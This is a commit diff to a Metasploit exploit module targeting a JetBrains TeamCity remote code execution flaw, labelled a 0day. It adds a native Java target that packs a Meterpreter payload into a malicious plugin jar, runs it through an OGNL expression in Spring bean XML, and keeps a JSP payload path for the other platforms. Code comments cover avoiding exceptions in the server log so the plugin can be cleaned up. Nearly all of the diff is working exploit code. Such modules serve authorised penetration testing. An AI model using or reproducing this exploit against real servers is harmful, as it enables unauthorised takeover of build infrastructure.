add native java payload support

modules/exploits/multi/http/jetbrains_teamcity_rce_0day.rb

@@ -26,12 +26,18 @@ class MetasploitModule < Msf::Exploit::Remote
           # ['URL', ''],
         ],
         'DisclosureDate' => '2024-01-01',
-        'Platform' => %w[win linux unix],
+        'Platform' => %w[java win linux unix],
         'Arch' => [ARCH_JAVA, ARCH_CMD],
         'Privileged' => false, # TeamCity may be installed to run as local system/root, or it may be run as a custom user account.
         'Targets' => [
           [
             'Java', {
+              'Platform' => 'java',
+              'Arch' => ARCH_JAVA
+            }
+          ],
+          [
+            'Java Server Page', {
               'Platform' => %w[win linux unix],
               'Arch' => ARCH_JAVA
             }
@@ -182,10 +188,38 @@ class MetasploitModule < Msf::Exploit::Remote
 </beans>)
         )
       elsif target['Arch'] == ARCH_JAVA
+        # If the platform is java we can bootstrap a Java Meterpreter
+        if target['Platform'] == 'java'
+          zip_resources = payload.encoded_jar(random: true)
 
-        zip_resources = Rex::Zip::Archive.new
+          payload_bean_id = Rex::Text.rand_text_alpha(8)
+
+          bootstrap_ognl = "\#{ #{payload_bean_id}.main(null) }"
+
+          # NOTE: We place bootstrap_ognl in a separate bean, as it this generates an exception the plugin will fail
+          # to load correctly, which prevents the exploit from deleting the plugin later. We choose java.beans.Encoder
+          # as the setExceptionListener method will accept the null value the bootstrap_ognl will generate. If we
+          # choose a property that does no exist, we generate a several of exceptions in the teamcity-server.log.
+
+          zip_resources.add_file(
+            "META-INF/build-server-plugin-#{plugin_name}.xml",
+            %(<?xml version="1.0" encoding="UTF-8"?>
+<beans xmlns="http://www.springframework.org/schema/beans"
+  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+  xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans-3.0.xsd">
+  <bean id="#{payload_bean_id}" class="#{zip_resources.substitutions['metasploit']}.Payload"/>
+  <bean class="java.beans.Encoder">
+    <property name="exceptionListener" value="#{bootstrap_ognl}"/>
+  </bean>
+</beans>)
+          )
+        else
+          # For non java platforms with ARCH_JAVA, we can drop a JSP payload.
+          zip_resources = Rex::Zip::Archive.new
+
+          zip_resources.add_file("buildServerResources/#{plugin_name}.jsp", payload.encoded)
+        end
 
-        zip_resources.add_file("buildServerResources/#{plugin_name}.jsp", payload.encoded)
       else
         fail_with(Failure::BadConfig, 'Unsupported target architecture')
       end
@@ -298,10 +332,10 @@ class MetasploitModule < Msf::Exploit::Remote
         end
 
         #
-        # 7. Trigger the payload and get a session. ARCH_JAVA payloads need us to hit an endpoint. ARCH_CMD payloads
-        # are triggered upon enabling a loaded plugin.
+        # 7. Trigger the payload and get a session. ARCH_JAVA JSP payloads need us to hit an endpoint. ARCH_JAVA Java
+        # payloads and ARCH_CMD payloads are triggered upon enabling a loaded plugin.
         #
-        if target['Arch'] == ARCH_JAVA
+        if target['Arch'] == ARCH_JAVA && target['Platform'] != 'java'
           res = send_request_cgi(
             'method' => 'GET',
             'uri' => normalize_uri(target_uri.path, 'plugins', plugin_name, "#{plugin_name}.jsp"),